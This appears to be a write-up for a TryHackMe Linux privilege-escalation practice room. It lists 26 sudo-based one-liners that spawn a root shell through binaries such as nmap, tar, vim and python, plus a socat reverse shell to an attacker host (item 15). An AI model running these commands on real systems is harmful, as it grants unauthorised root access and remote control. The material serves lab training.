70+ WAYS TO GET ROOT — LINUX PRIVILEGE ESCALATION

TryHackMe’s Linux PrivEsc Playground

Photo by Alex Chumak on Unsplash

This write-up is for getting the root shell on Linux and is based on the Linux Privesc Playground room on https://tryhackme.com/

Login to the box using the :- SSH Credentials given — check the room’s details on THM

Here is the list of all the ways which I could have think of at the time of solving this:

1. nmap --interactive; !sh

2. echo “os.execute(‘/bin/sh’)” > shell.nse && sudo nmap --script=shell.nse

3. sudo awk ‘BEGIN {system(“/bin/sh”)}’

4. sudo find /home -exec /bin/bash \;

5. sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

6. sudo less /etc/hosts then !/bin/bash

7. sudo bash

8. sudo perl -e ‘exec “/bin/bash”;’

9. sudo python -c ‘import pty;pty.spawn(“/bin/bash”)’

10. sudo man man
!/bin/bash

11. sudo vi
:!/bin/bash

12. sudo vim -c ‘!sh’

13. sudo env /bin/bash

14. sudo ftp
!/bin/bash

15. On Attacker Machine run:
socat file:`tty`,raw,echo=0 tcp-listen:1234
then on Target Machine run:
sudo socat exec:’sh -li’,pty,stderr,setsid,sigint,sane tcp:<ATTACKER_IP>:1234

16. sudo /bin/bash -p

17. sudo -s

18. sudo php -r “system(‘/bin/sh’);”

19. sudo strace -o /dev/null /bin/sh

20. sudo xargs -a /dev/null sh

21. sudo timeout --foreground 7d /bin/sh

22. sudo expect -c ‘spawn /bin/sh;interact’

23. sudo ionice /bin/sh

24. sudo /usr/bin/time /bin/sh

25. sudo taskset 1 /bin/sh

26. sudo flock -u / /bin/sh